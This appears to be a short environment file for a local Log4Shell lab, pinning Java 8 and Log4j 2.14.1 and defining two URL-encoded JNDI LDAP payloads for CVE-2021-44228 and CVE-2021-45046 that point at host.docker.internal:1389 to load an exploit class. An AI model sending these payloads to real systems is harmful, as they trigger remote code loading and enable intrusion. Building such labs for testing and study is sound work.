JAVA_VERSION=java8
PAYLOAD_44228='$%7Bjndi:ldap://host.docker.internal:1389/Exploit44228%7D'
PAYLOAD_45046='$%7Bjndi:ldap://host.docker.internal#host.docker.internal:1389/Exploit45046%7D'
LOG4J_VERSION=2.14.1
